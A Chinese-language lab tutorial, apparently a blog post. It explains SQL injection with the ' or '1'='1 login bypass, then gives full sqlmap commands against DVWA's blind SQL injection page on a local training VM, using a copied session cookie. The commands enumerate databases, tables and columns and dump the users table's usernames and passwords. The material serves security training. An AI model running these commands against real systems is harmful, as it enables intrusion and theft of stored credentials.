利用SQLmap实现 SQL 注入

目录

前言:

1 环境准备

1.开启OWASP靶机和Kali虚拟机

​2.打开火狐浏览器,输入靶机的ip

3.进入靶场,点击Damn选项 

4.kali中登陆dvwa(用户名和密码都是 admin),进入 SQL Injection(Blind)页面,安全等级调为low

2 利用SQLmap实现 SQL 注入案例

1.点击SQL injection(Bind)选项

 2.随意输入一个数字,如将ID输入为:1,然后单击“提交”。在浏览器地址栏复制URL

 3.F12打开开发者工具

4.由于浏览器提交方式为get型

5.为了查看有哪些数据库

6.为了查看有当前数据库

7.为了查看数据库中所有的表

8.为了查看users表中有哪些列

9.爆破表中user和password这两列

 3.总结


前言:

所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。

数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。可是,很多Web站点都会利用用户输入的参数动态的生成SQL查询要求,攻击者通过在URL、表格域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据库进行不受限的访问。

这个语句简单地指明了从user的表中查询用户名和username相等的,并且密码和password相等的。所以,如果用户发送用户名为”admin”,并且密码为”admin”,那么SQL语句被创建如下:

SELECT * FROM user WHERE username='admin' AND password ='admin'

那么,如果用户输入’ or ‘1’=’1,第一个引号会终止输入的字符串,剩下的会被当做SQL语句,并且在SQL语句中1=1恒为真,这就能够绕过注册机制。

SELECT * FROM user WHERE username='admin' AND password =''or '1'='1'。
 

1 环境准备

1.开启OWASP靶机和Kali虚拟机

2.打开火狐浏览器,输入靶机的ip

3.进入靶场,点击Damn选项 

4.kali中登陆dvwa(用户名和密码都是 admin),进入 SQL Injection(Blind)页面,安全等级调为low

 

2 利用SQLmap实现 SQL 注入案例

1.点击SQL injection(Bind)选项

 2.随意输入一个数字,如将ID输入为:1,然后单击“提交”。在浏览器地址栏复制URL

 3.F12打开开发者工具

选中Storage(存储)选项卡,找到cookies,复制其中的PHPSESSID的值(获取cookies,为之后绕过登录页面做准备)

4.由于浏览器提交方式为get型

sqlmap采用-u命令。将刚才复制的URL和COOKIE写入命令:

sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch

(使用sqlmap进行get型注入,cookie用来绕过登录页面)

 可以获取到注入点:

5.为了查看有哪些数据库

发现两个数据库,dvwa和information_schema

输入命令:sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch --dbs

6.为了查看有当前数据库

输入命令:sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch --current-db

7.为了查看数据库中所有的表

输入命令:sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch -D dvwa --tables

8.为了查看users表中有哪些列

输入命令:sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch -D dvwa -T users --columns

9.爆破表中user和password这两列

sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch -D dvwa -T users -C"user,password" --dump

 3.总结

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值